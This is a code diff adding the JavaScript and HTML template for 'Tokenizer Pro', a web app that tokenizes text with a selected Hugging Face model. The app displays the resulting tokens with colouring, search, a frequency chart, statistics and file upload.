+ // Add each special token with proper escaping for HTML special characters
139
+ for (const [tokenName, tokenValue] of Object.entries(info.special_tokens)) {
140
+ // Properly escape HTML special characters
141
+ const escapedValue = tokenValue
142
+ .replace(/&/g, '&amp;')
143
+ .replace(/</g, '&lt;')
144
+ .replace(/>/g, '&gt;')
145
+ .replace(/"/g, '&quot;')
146
+ .replace(/'/g, '&#039;');
147
+
148
+ htmlContent += `
149
+ <div class="special-token-item">
150
+ <span class="token-name">${tokenName}:</span>
151
+ <span class="token-value">${escapedValue}</span>
152
+ </div>`;
153
+ }
154
+
155
+ htmlContent += `
156
+ </div>
157
+ </div>`;
158
+ }
159
+
160
+ $(targetSelector).html(htmlContent);
161
+ }
162
+
163
+ // Function to show loading overlay
164
+ function showLoadingOverlay(text = 'Loading...') {
165
+ $('#loadingText').text(text);
166
+ $('#loadingOverlay').addClass('active');
167
+ }
168
+
169
+ // Function to hide loading overlay
170
+ function hideLoadingOverlay() {
171
+ $('#loadingOverlay').removeClass('active');
172
+ }
173
+
174
+ // Function to fetch tokenizer info
175
+ function fetchTokenizerInfo(modelId, isCustom = false) {
176
+ if (!modelId) return;
177
+
178
+ const targetSelector = isCustom ? '#customTokenizerInfoContent' : '#tokenizerInfoContent';
179
+ $(targetSelector).html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
180
+
181
+ $.ajax({
182
+ url: '/tokenizer-info',
183
+ method: 'GET',
184
+ data: {
185
+ model_id: modelId,
186
+ is_custom: isCustom
187
+ },
188
+ success: function(response) {
189
+ if (response.error) {
190
+ $(targetSelector).html(`<div class="tokenizer-info-error">${response.error}</div>`);
191
+ } else {
192
+ currentTokenizerInfo = response;
193
+ updateTokenizerInfoDisplay(response, isCustom);
194
+ }
195
+ },
196
+ error: function(xhr) {
197
+ $(targetSelector).html('<div class="tokenizer-info-error">Failed to load tokenizer information</div>');
198
+ }
199
+ });
200
+ }
201
+
202
+ // Token search functionality
203
+ let searchMatches = [];
204
+ let currentSearchIndex = -1;
205
+ let searchVisible = false;
206
+
207
+ // Token frequency functionality
208
+ let tokenFrequencyData = [];
209
+ let showFrequencyChart = false;
210
+
211
+ function performTokenSearch(searchTerm) {
212
+ const tokenContainer = $('#tokenContainer');
213
+ const tokens = tokenContainer.find('.token');
214
+
215
+ // Clear previous highlights
216
+ tokens.removeClass('highlighted current');
217
+ searchMatches = [];
218
+ currentSearchIndex = -1;
219
+
220
+ if (!searchTerm.trim()) {
221
+ updateSearchCount();
222
+ return;
223
+ }
224
+
225
+ const searchLower = searchTerm.toLowerCase();
226
+
227
+ // Find matching tokens
228
+ tokens.each(function(index) {
229
+ const tokenText = $(this).text().toLowerCase();
230
+ if (tokenText.includes(searchLower)) {
231
+ $(this).addClass('highlighted');
232
+ searchMatches.push(index);
233
+ }
234
+ });
235
+
236
+ updateSearchCount();
237
+
238
+ // Navigate to first match if any
239
+ if (searchMatches.length > 0) {
240
+ navigateToMatch(0);
241
+ }
242
+ }
243
+
244
+ function navigateToMatch(index) {
245
+ if (searchMatches.length === 0) return;
246
+
247
+ // Remove current highlight
248
+ $('.token.current').removeClass('current');
249
+
250
+ // Update current index
251
+ currentSearchIndex = index;
252
+
253
+ // Highlight current match
254
+ const tokenContainer = $('#tokenContainer');
255
+ const tokens = tokenContainer.find('.token');
256
+ const currentToken = tokens.eq(searchMatches[currentSearchIndex]);
257
+ currentToken.addClass('current');
258
+
259
+ // Scroll to current match - improved logic
260
+ const scrollContainer = tokenContainer;
261
+ const containerOffset = scrollContainer.offset();
262
+ const tokenOffset = currentToken.offset();
263
+
264
+ if (containerOffset && tokenOffset) {
265
+ const containerHeight = scrollContainer.height();
266
+ const containerScrollTop = scrollContainer.scrollTop();
267
+ const tokenRelativeTop = tokenOffset.top - containerOffset.top;
268
+
269
+ // Check if token is outside visible area
270
+ if (tokenRelativeTop < 0 || tokenRelativeTop > containerHeight - 50) {
271
+ // Calculate new scroll position to center the token
272
+ const tokenHeight = currentToken.outerHeight();
273
+ const newScrollTop = containerScrollTop + tokenRelativeTop - (containerHeight / 2) + (tokenHeight / 2);
274
+
275
+ scrollContainer.animate({
276
+ scrollTop: Math.max(0, newScrollTop)
277
+ }, 400, 'swing');
278
+ }
279
+ }
280
+
281
+ updateSearchCount();
282
+ }
283
+
284
+ function toggleSearchVisibility() {
285
+ console.log('toggleSearchVisibility called, current state:', searchVisible);
286
+ searchVisible = !searchVisible;
287
+ const container = $('#tokenSearchContainer');
288
+ const toggleBtn = $('#searchToggleBtn');
289
+
290
+ console.log('Container found:', container.length, 'Toggle button found:', toggleBtn.length);
291
+
292
+ if (searchVisible) {
293
+ // Show the container first, then animate
294
+ container.show();
295
+ setTimeout(() => {
296
+ container.addClass('show');
297
+ }, 10);
298
+ toggleBtn.addClass('active');
299
+ console.log('Showing search container');
300
+ setTimeout(() => {
301
+ $('#tokenSearchInput').focus();
302
+ }, 300);
303
+ } else {
304
+ container.removeClass('show');
305
+ toggleBtn.removeClass('active');
306
+ console.log('Hiding search container');
307
+ setTimeout(() => {
308
+ container.hide();
309
+ }, 300);
310
+ // Clear search when hiding
311
+ $('#tokenSearchInput').val('');
312
+ performTokenSearch('');
313
+ }
314
+ }
315
+
316
+ function updateSearchCount() {
317
+ const countText = searchMatches.length > 0
318
+ ? `${currentSearchIndex + 1}/${searchMatches.length}`
319
+ : `0/${searchMatches.length}`;
320
+ $('#searchCount').text(countText);
321
+
322
+ // Update navigation button states
323
+ $('#prevMatch').prop('disabled', searchMatches.length === 0 || currentSearchIndex <= 0);
324
+ $('#nextMatch').prop('disabled', searchMatches.length === 0 || currentSearchIndex >= searchMatches.length - 1);
325
+ }
326
+
327
+ // Token frequency chart functions
328
+ function calculateTokenFrequency(tokens) {
329
+ const frequencyMap = {};
330
+
331
+ tokens.each(function() {
332
+ const tokenText = $(this).text();
333
+ if (tokenText.trim()) {
334
+ frequencyMap[tokenText] = (frequencyMap[tokenText] || 0) + 1;
335
+ }
336
+ });
337
+
338
+ // Convert to array and sort by frequency
339
+ const frequencyArray = Object.entries(frequencyMap)
340
+ .map(([token, count]) => ({ token, count }))
341
+ .sort((a, b) => b.count - a.count)
342
+ .slice(0, 10); // Top 10 tokens
343
+
344
+ return frequencyArray;
345
+ }
346
+
347
+ function renderFrequencyChart(frequencyData) {
348
+ const chartContainer = $('#frequencyChart');
349
+ chartContainer.empty();
350
+
351
+ if (frequencyData.length === 0) {
352
+ chartContainer.html('<div style="text-align: center; color: var(--secondary-text); padding: 1rem;">No token data available</div>');
353
+ return;
354
+ }
355
+
356
+ const maxCount = frequencyData[0].count;
357
+
358
+ frequencyData.forEach(({ token, count }) => {
359
+ const percentage = (count / maxCount) * 100;
360
+
361
+ const item = $(`
362
+ <div class="frequency-item">
363
+ <div class="frequency-token" data-token="${token}">${token}</div>
364
+ <div class="frequency-bar-container">
365
+ <div class="frequency-bar">
366
+ <div class="frequency-bar-fill" style="width: ${percentage}%"></div>
367
+ </div>
368
+ <div class="frequency-count">${count}</div>
369
+ </div>
370
+ </div>
371
+ `);
372
+
373
+ // Add click handler to search for this token
374
+ item.find('.frequency-token').click(function() {
375
+ const searchToken = $(this).data('token');
376
+ $('#tokenSearchInput').val(searchToken);
377
+ performTokenSearch(searchToken);
378
+ });
379
+
380
+ chartContainer.append(item);
381
+ });
382
+ }
383
+
384
+ function toggleFrequencyChart() {
385
+ showFrequencyChart = !showFrequencyChart;
386
+ const container = $('#frequencyChartContainer');
387
+ const chart = $('#frequencyChart');
388
+ const toggleBtn = $('#toggleFrequencyChart');
389
+
390
+ if (showFrequencyChart) {
391
+ container.show();
392
+ chart.show();
393
+ toggleBtn.text('Hide Chart').addClass('active');
394
+
395
+ // Calculate and render frequency data
396
+ const tokens = $('#tokenContainer').find('.token');
397
+ tokenFrequencyData = calculateTokenFrequency(tokens);
398
+ renderFrequencyChart(tokenFrequencyData);
399
+ } else {
400
+ chart.hide();
401
+ toggleBtn.text('Show Chart').removeClass('active');
402
+ }
403
+ }
404
+
405
+ function updateResults(data) {
406
+ $('#results').show();
407
+
408
+ // Show search toggle button and frequency chart container
409
+ $('#searchToggleBtn').show();
410
+ $('#frequencyChartContainer').show();
411
+
412
+ // Update tokens
413
+ const tokenContainer = $('#tokenContainer');
414
+ tokenContainer.empty();
415
+ data.tokens.forEach(token => {
416
+ const span = $('<span>')
417
+ .addClass('token')
418
+ .css({
419
+ 'background-color': token.colors.background,
420
+ 'color': token.colors.text
421
+ })
422
+ // Include token id in the tooltip on hover
423
+ .attr('title', `Original token: ${token.original} | Token ID: ${token.token_id}`)
424
+ .text(token.display);
425
+
426
+ tokenContainer.append(span);
427
+ if (token.newline) {
428
+ tokenContainer.append('<br>');
429
+ }
430
+ });
431
+
432
+ // Re-apply current search if any
433
+ const currentSearch = $('#tokenSearchInput').val();
434
+ if (currentSearch.trim()) {
435
+ performTokenSearch(currentSearch);
436
+ }
437
+
438
+ // Update display limit notice
439
+ if (data.display_limit_reached) {
440
+ $('#displayLimitNotice').show();
441
+ $('#totalTokenCount').text(data.total_tokens);
442
+ } else {
443
+ $('#displayLimitNotice').hide();
444
+ }
445
+
446
+ // Update preview notice
447
+ if (data.preview_only) {
448
+ $('#previewNotice').show();
449
+ } else {
450
+ $('#previewNotice').hide();
451
+ }
452
+
453
+ // Update basic stats
454
+ $('#totalTokens').text(data.stats.basic_stats.total_tokens);
455
+ $('#uniqueTokens').text(`${data.stats.basic_stats.unique_tokens} unique`);
456
+ $('#uniquePercentage').text(data.stats.basic_stats.unique_percentage);
457
+ $('#specialTokens').text(data.stats.basic_stats.special_tokens);
458
+ $('#spaceTokens').text(data.stats.basic_stats.space_tokens);
459
+ $('#spaceCount').text(data.stats.basic_stats.space_tokens);
460
+ $('#newlineCount').text(data.stats.basic_stats.newline_tokens);
461
+ $('#compressionRatio').text(data.stats.basic_stats.compression_ratio);
462
+
463
+ // Update length stats
464
+ $('#avgLength').text(data.stats.length_stats.avg_length);
465
+ $('#medianLength').text(data.stats.length_stats.median_length);
466
+ $('#stdDev').text(data.stats.length_stats.std_dev);
467
+
468
+ // Update tokenizer info if available
469
+ if (data.tokenizer_info) {
470
+ currentTokenizerInfo = data.tokenizer_info;
471
+ updateTokenizerInfoDisplay(data.tokenizer_info, currentModelType === 'custom');
472
+ }
473
+ }
474
+
475
+ // Handle text changes to detach file
476
+ $('#textInput').on('input', function() {
477
+ // Skip if file was just uploaded (prevents immediate detachment)
478
+ if (fileJustUploaded) {
479
+ fileJustUploaded = false;
480
+ return;
481
+ }
482
+
483
+ const currentText = $(this).val();
484
+ const fileInput = document.getElementById('fileInput');
485
+
486
+ // Only detach if a file exists and text has been substantially modified
487
+ if (fileInput.files.length > 0 && originalTextContent !== null) {
488
+ // Check if the text is completely different or has been significantly changed
489
+ // This allows for small edits without detaching
490
+ const isMajorChange =
491
+ currentText.length < originalTextContent.length * 0.8 || // Text reduced by at least 20%
492
+ (currentText.length > 0 &&
493
+ currentText !== originalTextContent.substring(0, currentText.length) &&
494
+ currentText.substring(0, Math.min(20, currentText.length)) !==
495
+ originalTextContent.substring(0, Math.min(20, currentText.length)));
496
+
497
+ if (isMajorChange) {
498
+ detachFile();
499
+ }
500
+ }
501
+ });
502
+
503
+ // Function to detach file
504
+ function detachFile() {
505
+ // Clear the file input
506
+ $('#fileInput').val('');
507
+ // Hide file info
508
+ $('#fileInfo').fadeOut(300);
509
+ // Reset the original content tracker
510
+ originalTextContent = $('#textInput').val();
511
+ // Reset last uploaded filename
512
+ lastUploadedFileName = null;
513
+ }
514
+
515
+ // For model changes
516
+ $('#modelSelect').change(function() {
517
+ const selectedModel = $(this).val();
518
+ $('#modelInput').val(selectedModel);
519
+
520
+ // Fetch tokenizer info for the selected model
521
+ fetchTokenizerInfo(selectedModel, false);
522
+
523
+ // If text exists, submit the form
524
+ if ($('#textInput').val().trim()) {
525
+ $('#analyzeForm').submit();
526
+ }
527
+ });
528
+
529
+ // File drop handling
530
+ const fileDropZone = $('#fileDropZone');
531
+ const fileUploadIcon = $('#fileUploadIcon');
532
+
533
+ // Prevent default drag behaviors
534
+ ['dragenter', 'dragover', 'dragleave', 'drop'].forEach(eventName => {
535
+ fileDropZone[0].addEventListener(eventName, preventDefaults, false);
536
+ document.body.addEventListener(eventName, preventDefaults, false);
537
+ });
538
+
539
+ function preventDefaults(e) {
540
+ e.preventDefault();
541
+ e.stopPropagation();
542
+ }
543
+
544
+ // Show drop zone when file is dragged over the document
545
+ document.addEventListener('dragenter', showDropZone, false);
546
+ document.addEventListener('dragover', showDropZone, false);
547
+
548
+ fileDropZone[0].addEventListener('dragleave', hideDropZone, false);
549
+ fileDropZone[0].addEventListener('drop', hideDropZone, false);
550
+
551
+ function showDropZone(e) {
552
+ fileDropZone.addClass('active');
553
+ }
554
+
555
+ function hideDropZone() {
556
+ fileDropZone.removeClass('active');
557
+ }
558
+
559
+ // Handle dropped files
560
+ fileDropZone[0].addEventListener('drop', handleDrop, false);
561
+
562
+ function handleDrop(e) {
563
+ const dt = e.dataTransfer;
564
+ const files = dt.files;
565
+ handleFiles(files);
566
+ }
567
+
568
+ // Also handle file selection via click on the icon
569
+ fileUploadIcon.on('click', function() {
570
+ const input = document.createElement('input');
571
+ input.type = 'file';
572
+ input.onchange = e => {
573
+ handleFiles(e.target.files);
574
+ };
575
+ input.click();
576
+ });
577
+
578
+ function handleFiles(files) {
579
+ if (files.length) {
580
+ const file = files[0];
581
+ currentFile = file;
582
+ lastUploadedFileName = file.name;
583
+ fileJustUploaded = true; // Set flag to prevent immediate detachment
584
+
585
+ // Show file info with animation and add detach button
586
+ $('#fileInfo').html(`${file.name} (${formatFileSize(file.size)}) <span class="file-detach" id="fileDetach"><i class="fas fa-times"></i></span>`).fadeIn(300);
587
+
588
+ // Add click handler for detach button
589
+ $('#fileDetach').on('click', function(e) {
590
+ e.stopPropagation(); // Prevent event bubbling
591
+ detachFile();
592
+ return false;
593
+ });
594
+
595
+ // Set the file to the file input
596
+ const dataTransfer = new DataTransfer();
597
+ dataTransfer.items.add(file);
598
+ document.getElementById('fileInput').files = dataTransfer.files;
599
+
600
+ // Preview in textarea (first 8096 chars)
601
+ const reader = new FileReader();
602
+ reader.onload = function(e) {
603
+ const previewText = e.target.result.slice(0, 8096);
604
+ $('#textInput').val(previewText);
605
+
606
+ // Store this as the original content AFTER setting the value
607
+ // to prevent the input event from firing and detaching immediately
608
+ setTimeout(() => {
609
+ originalTextContent = previewText;
610
+ // Automatically submit for analysis
611
+ $('#analyzeForm').submit();
612
+ }, 50);
613
+ };
614
+ reader.readAsText(file);
615
+ }
616
+ }
617
+
618
+ function formatFileSize(bytes) {
619
+ if (bytes < 1024) return bytes + ' bytes';
620
+ else if (bytes < 1048576) return (bytes / 1024).toFixed(1) + ' KB';
621
+ else return (bytes / 1048576).toFixed(1) + ' MB';
622
+ }
623
+
624
+ // Make sure to check if there's still a file when analyzing
625
+ $('#analyzeForm').on('submit', function(e) {
626
+ e.preventDefault();
627
+
628
+ // Skip detachment check if file was just uploaded
629
+ if (!fileJustUploaded) {
630
+ // Check if text has been changed but file is still attached
631
+ const textInput = $('#textInput').val();
632
+ const fileInput = document.getElementById('fileInput');
633
+
634
+ if (fileInput.files.length > 0 &&
635
+ originalTextContent !== null &&
636
+ textInput !== originalTextContent &&
637
+ textInput.length < originalTextContent.length * 0.8) {
638
+ // Text was significantly changed but file is still attached, detach it
639
+ detachFile();
640
+ }
641
+ } else {
642
+ // Reset flag after first submission
643
+ fileJustUploaded = false;
644
+ }
645
+
646
+ // Update the hidden inputs based on current model type
647
+ if (currentModelType === 'custom') {
648
+ $('#customModelInputHidden').val($('#customModelInput').val());
649
+ } else {
650
+ $('#modelInput').val($('#modelSelect').val());
651
+ }
652
+
653
+ const formData = new FormData(this);
654
+ const analyzeButton = $('#analyzeButton');
655
+ const originalButtonText = analyzeButton.text();
656
+
657
+ analyzeButton.prop('disabled', true);
658
+ analyzeButton.html(originalButtonText + '<span class="loading-spinner"></span>');
659
+ showLoadingOverlay('Analyzing text...');
660
+
661
+ $.ajax({
662
+ url: '/',
663
+ method: 'POST',
664
+ data: formData,
665
+ processData: false,
666
+ contentType: false,
667
+ success: function(response) {
668
+ if (response.error) {
669
+ showError(response.error);
670
+ } else {
671
+ updateResults(response);
672
+
673
+ // Show success badge if custom model
674
+ if (currentModelType === 'custom') {
675
+ $('#modelSuccessBadge').addClass('show');
676
+ setTimeout(() => {
677
+ $('#modelSuccessBadge').removeClass('show');
678
+ }, 3000);
679
+ }
680
+ }
681
+ },
682
+ error: function(xhr) {
683
+ showError(xhr.responseText || 'An error occurred while processing the text');
684
+ },
685
+ complete: function() {
686
+ analyzeButton.prop('disabled', false);
687
+ analyzeButton.text(originalButtonText);
688
+ hideLoadingOverlay();
689
+ }
690
+ });
691
+ });
692
+
693
+ $('#expandButton').click(function() {
694
+ const container = $('#tokenContainer');
695
+ const isExpanded = container.hasClass('expanded');
696
+
697
+ container.toggleClass('expanded');
698
+ $(this).text(isExpanded ? 'Show More' : 'Show Less');
699
+ });
700
+
701
+ // Initialize tokenizer info for current model
702
+ if (currentModelType === 'predefined') {
703
+ fetchTokenizerInfo($('#modelSelect').val(), false);
704
+ } else if ($('#customModelInput').val()) {
705
+ fetchTokenizerInfo($('#customModelInput').val(), true);
706
+ }
707
+
708
+ // Add event listener for custom model input
709
+ $('#customModelInput').on('change', function() {
710
+ const modelValue = $(this).val();
711
+ if (modelValue) {
712
+ fetchTokenizerInfo(modelValue, true);
713
+ }
714
+ });
715
+
716
+ // Keyboard shortcuts - specifically for textarea
717
+ $('#textInput').keydown(function(e) {
718
+ // Ctrl+Enter (or Cmd+Enter on Mac) to analyze
719
+ if ((e.ctrlKey || e.metaKey) && (e.keyCode === 13 || e.which === 13)) {
720
+ e.preventDefault();
721
+ if ($(this).val().trim()) {
722
+ $('#analyzeForm').submit();
723
+ }
724
+ return false;
725
+ }
726
+ });
727
+
728
+ // Global keyboard shortcuts
729
+ $(document).keydown(function(e) {
730
+ // Ctrl+F (or Cmd+F on Mac) to toggle search
731
+ if ((e.ctrlKey || e.metaKey) && (e.keyCode === 70 || e.which === 70)) {
732
+ if ($('#searchToggleBtn').is(':visible')) {
733
+ e.preventDefault();
734
+ if (!searchVisible) {
735
+ toggleSearchVisibility();
736
+ } else {
737
+ $('#tokenSearchInput').focus();
738
+ }
739
+ return false;
740
+ }
741
+ }
742
+
743
+ // Escape to close search or loading overlay
744
+ if (e.keyCode === 27 || e.which === 27) {
745
+ if (searchVisible) {
746
+ toggleSearchVisibility();
747
+ return false;
748
+ }
749
+ if ($('#loadingOverlay').hasClass('active')) {
750
+ // Don't close if there's an active request
751
+ return false;
752
+ }
753
+ }
754
+ });
755
+
756
+ // Add keyboard shortcut hint to the textarea placeholder
757
+ $('#textInput').attr('placeholder', 'Enter text to analyze or upload a file in bottom left corner... (Ctrl+Enter to analyze)');
758
+
759
+ // Token search event handlers
760
+ $('#tokenSearchInput').on('input', function() {
761
+ const searchTerm = $(this).val();
762
+ performTokenSearch(searchTerm);
763
+ });
764
+
765
+ $('#nextMatch').click(function() {
766
+ if (currentSearchIndex < searchMatches.length - 1) {
767
+ navigateToMatch(currentSearchIndex + 1);
768
+ }
769
+ });
770
+
771
+ $('#prevMatch').click(function() {
772
+ if (currentSearchIndex > 0) {
773
+ navigateToMatch(currentSearchIndex - 1);
774
+ }
775
+ });
776
+
777
+ $('#clearSearch').click(function() {
778
+ $('#tokenSearchInput').val('');
779
+ performTokenSearch('');
780
+ });
781
+
782
+ // Additional keyboard shortcuts for search
783
+ $('#tokenSearchInput').keydown(function(e) {
784
+ if (e.keyCode === 13) { // Enter
785
+ e.preventDefault();
786
+ if (e.shiftKey) {
787
+ // Shift+Enter: previous match
788
+ $('#prevMatch').click();
789
+ } else {
790
+ // Enter: next match
791
+ $('#nextMatch').click();
792
+ }
793
+ } else if (e.keyCode === 27) { // Escape
794
+ $('#clearSearch').click();
795
+ $(this).blur();
796
+ }
797
+ });
798
+
799
+ // Search toggle handler using event delegation
800
+ $(document).on('click', '#searchToggleBtn', function(e) {
801
+ console.log('Search toggle button clicked!');
802
+ e.preventDefault();
803
+ e.stopPropagation();
804
+ toggleSearchVisibility();
805
+ return false;
806
+ });
807
+
808
+ // Frequency chart toggle handler
809
+ $('#toggleFrequencyChart').click(function() {
810
+ toggleFrequencyChart();
811
+ });
812
+
813
+ // Mobile touch enhancements
814
+ function addTouchSupport() {
815
+ // Add touch-friendly double-tap for expand/collapse
816
+ let lastTap = 0;
817
+ $('#tokenContainer').on('touchend', function(e) {
818
+ const currentTime = new Date().getTime();
819
+ const tapLength = currentTime - lastTap;
820
+ if (tapLength < 500 && tapLength > 0) {
821
+ $('#expandButton').click();
822
+ e.preventDefault();
823
+ }
824
+ lastTap = currentTime;
825
+ });
826
+
827
+ // Improve touch scrolling for token container
828
+ $('#tokenContainer').on('touchstart', function(e) {
829
+ this.scrollTop = this.scrollTop;
830
+ });
831
+ }
832
+
833
+ // Check if mobile device and add touch support
834
+ if ('ontouchstart' in window || navigator.maxTouchPoints > 0) {
835
+ addTouchSupport();
836
+ }
837
+ });
app/templates/index.html ADDED
@@ -0,0 +1,213 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html>
3
+ <head>
4
+ <title>Tokenizer Pro</title>
5
+ <meta charset="UTF-8">
6
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
7
+ <link rel="icon" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 512 512'><circle fill='%230f4f9b' cx='256' cy='256' r='256'/><g transform='translate(32 0)'><path fill='white' d='M64 128l0-32 128 0 0 128-16 0c-17.7 0-32 14.3-32 32s14.3 32 32 32l96 0c17.7 0 32-14.3 32-32s-14.3-32-32-32l-16 0 0-128 128 0 0 32c0 17.7 14.3 32 32s32-14.3 32-32l0-48c0-26.5-21.5-48-48-48L224 32 48 32C21.5 32 0 53.5 0 80l0 48c0 17.7 14.3 32 32 32s32-14.3 32-32zM9.4 361.4c-12.5 12.5-12.5 32.8 0 45.3l64 64c9.2 9.2 22.9 11.9 34.9 6.9s19.8-16.6 19.8-29.6l0-32 192 0 0 32c0 12.9 7.8 24.6 19.8 29.6s25.7 2.2 34.9-6.9l64-64c12.5-12.5 12.5-32.8 0-45.3l-64-64c-9.2-9.2-22.9-11.9-34.9-6.9s-19.8 16.6-19.8 29.6l0 32-192 0 0-32c0-12.9-7.8-24.6-19.8-29.6s-25.7-2.2-34.9 6.9l-64 64z'/></g></svg>">
8
+ <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
9
+ <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css">
10
+ <link rel="stylesheet" href="{{ url_for('static', filename='css/style.css') }}">
11
+ </head>
12
+ <body>
13
+ <!-- Hidden File Drop Zone that appears when dragging files -->
14
+ <div id="fileDropZone" class="file-drop-zone">
15
+ <div class="drop-indicator">
16
+ <div class="file-icon">📄</div>
17
+ <p>Drop your file here</p>
18
+ </div>
19
+ </div>
20
+
21
+ <!-- Loading overlay -->
22
+ <div id="loadingOverlay" class="loading-overlay">
23
+ <div class="loading-content">
24
+ <div class="loading-spinner large"></div>
25
+ <div class="loading-text" id="loadingText">Analyzing text...</div>
26
+ </div>
27
+ </div>
28
+
29
+ <!-- File upload icon in bottom left corner -->
30
+ <div id="fileUploadIcon" class="file-upload-icon">
31
+ <span>📎</span>
32
+ </div>
33
+ <p class="file-info" id="fileInfo"></p>
34
+
35
+ <div class="container">
36
+ <div class="header">
37
+ <div class="title-section">
38
+ <h1 class="title">Tokenizer Pro</h1>
39
+ <p class="subtitle">Advanced tokenization analysis and visualization</p>
40
+ </div>
41
+ <div class="model-selector">
42
+ <div class="model-selector-header">
43
+ <div class="model-type-toggle">
44
+ <div class="toggle-option predefined-toggle active" data-type="predefined">Predefined</div>
45
+ <div class="toggle-option custom-toggle" data-type="custom">Custom</div>
46
+ </div>
47
+ </div>
48
+ <div id="predefinedModelSelector">
49
+ <div style="position: relative;">
50
+ <div class="tokenizer-info-icon" id="modelInfoIcon" title="View tokenizer information">ℹ</div>
51
+ <!-- TOOLTIP MOVED HERE -->
52
+ <div class="tokenizer-info-tooltip" id="modelInfoTooltip">
53
+ <div id="tokenizerInfoContent">
54
+ <div class="tokenizer-info-loading">
55
+ <div class="tokenizer-info-spinner"></div>
56
+ </div>
57
+ </div>
58
+ </div>
59
+ <!-- SELECT NOW COMES AFTER ICON AND TOOLTIP -->
60
+ <select id="modelSelect" name="model">
61
+ {% for model_id, info in models.items() %}
62
+ <option value="{{ model_id }}" {% if selected_model == model_id %}selected{% endif %}>
63
+ {{ info.alias }}
64
+ </option>
65
+ {% endfor %}
66
+ </select>
67
+ </div>
68
+ </div>
69
+ <div id="customModelSelector" style="display: none;" class="custom-model-wrapper">
70
+ <div style="position: relative;">
71
+ <div class="tokenizer-info-icon" id="customModelInfoIcon" title="View tokenizer information">ℹ</div>
72
+ <div class="tokenizer-info-tooltip" id="customModelInfoTooltip">
73
+ <div id="customTokenizerInfoContent">
74
+ <div class="tokenizer-info-loading">
75
+ <div class="tokenizer-info-spinner"></div>
76
+ </div>
77
+ </div>
78
+ </div>
79
+ <input type="text" id="customModelInput" class="custom-model-input"
80
+ placeholder="Enter HuggingFace model path"
81
+ value="{{ custom_model if custom_model and custom_model|length > 0 else '' }}">
82
+ </div>
83
+ <span class="custom-model-help">?</span>
84
+ <div class="tooltip">
85
+ Enter a valid HuggingFace model ID (e.g., "mistralai/Mistral-7B-Instruct-v0.3")
86
+ The model must have a tokenizer available and must be not restricted. (with some exceptions)
87
+ Also some models have restrictions. You can use mirrored versions, like unsloth to omit that.
88
+ Like ("unsloth/Meta-Llama-3.1-8B-Instruct-bnb-4bit") instead of original path.
89
+ </div>
90
+ <div class="model-badge" id="modelSuccessBadge">Loaded</div>
91
+ </div>
92
+ </div>
93
+ </div>
94
+
95
+ <div class="error-message" id="errorMessage">{{ error }}</div>
96
+
97
+ <div class="input-section">
98
+ <div class="keyboard-shortcut-hint">Ctrl+Enter</div>
99
+ <form id="analyzeForm" method="POST" enctype="multipart/form-data">
100
+ <textarea name="text" id="textInput" placeholder="Enter text to analyze or upload a file in bottom left corner...">{{ text }}</textarea>
101
+ <input type="hidden" name="model" id="modelInput" value="{{ selected_model }}">
102
+ <input type="hidden" name="custom_model" id="customModelInputHidden" value="{{ custom_model if custom_model else '' }}">
103
+ <input type="hidden" name="model_type" id="modelTypeInput" value="{{ model_type if model_type else 'predefined' }}">
104
+ <input type="file" name="file" id="fileInput" style="display: none;">
105
+ <div class="button-container">
106
+ <button type="submit" id="analyzeButton">Analyze Text</button>
107
+ </div>
108
+ </form>
109
+ </div>
110
+
111
+ <div id="results" class="results" {% if not token_data %}style="display: none;"{% endif %}>
112
+ <div class="card">
113
+ <div class="card-header">
114
+ <h2 class="card-title">Token Visualization</h2>
115
+ <button type="button" class="search-toggle-btn" id="searchToggleBtn" title="Toggle token search" style="display: none;">
116
+ <svg width="16" height="16" viewBox="0 0 24 24" fill="currentColor">
117
+ <path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/>
118
+ </svg>
119
+ </button>
120
+ </div>
121
+ <div class="token-search-container" id="tokenSearchContainer" style="display: none;">
122
+ <div class="token-search-row">
123
+ <input type="text" class="token-search-input" id="tokenSearchInput" placeholder="Search tokens...">
124
+ <div class="token-search-controls">
125
+ <button class="token-search-btn" id="prevMatch">◀</button>
126
+ <span class="token-search-count" id="searchCount">0/0</span>
127
+ <button class="token-search-btn" id="nextMatch">▶</button>
128
+ <button class="token-search-btn" id="clearSearch">Clear</button>
129
+ </div>
130
+ </div>
131
+ </div>
132
+ <div class="preview-notice" id="previewNotice">
133
+ Note: Showing preview of first 8096 characters. Stats are calculated on the full file.
134
+ </div>
135
+ <div class="token-container" id="tokenContainer">
136
+ {% if token_data %}
137
+ {% for token in token_data.tokens %}
138
+ <span class="token"
139
+ style="background-color: {{ token.colors.background }}; color: {{ token.colors.text }};"
140
+ title="Original token: {{ token.original }} | Token ID: {{ token.token_id }}">
141
+ {{ token.display }}
142
+ </span>
143
+ {% if token.newline %}<br>{% endif %}
144
+ {% endfor %}
145
+ {% endif %}
146
+ </div>
147
+ <button class="expand-button" id="expandButton">Show More</button>
148
+ <div class="display-limit-notice" id="displayLimitNotice">
149
+ Note: Only showing first 50,000 tokens. Total token count: <span id="totalTokenCount">0</span>
150
+ </div>
151
+
152
